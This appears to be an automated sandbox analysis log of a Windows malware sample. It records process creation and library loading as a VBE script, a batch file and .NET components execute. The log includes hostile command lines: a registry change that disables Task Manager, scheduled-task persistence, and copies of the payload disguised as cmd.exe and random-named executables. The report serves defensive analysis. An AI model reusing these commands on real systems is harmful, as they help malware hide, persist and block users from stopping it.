Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: unknown	Process created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Source: unknown	Process created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Source: unknown	Process created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: unknown	Process created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: unknown	Process created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Source: unknown	Process created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: version.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ktmw32.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: amsi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: userenv.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rasman.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: winmm.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mmdevapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: devobj.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ksuser.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: avrt.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: audioses.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: powrprof.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: umpdc.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: midimap.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: edputil.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: dwrite.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windowscodecs.dll
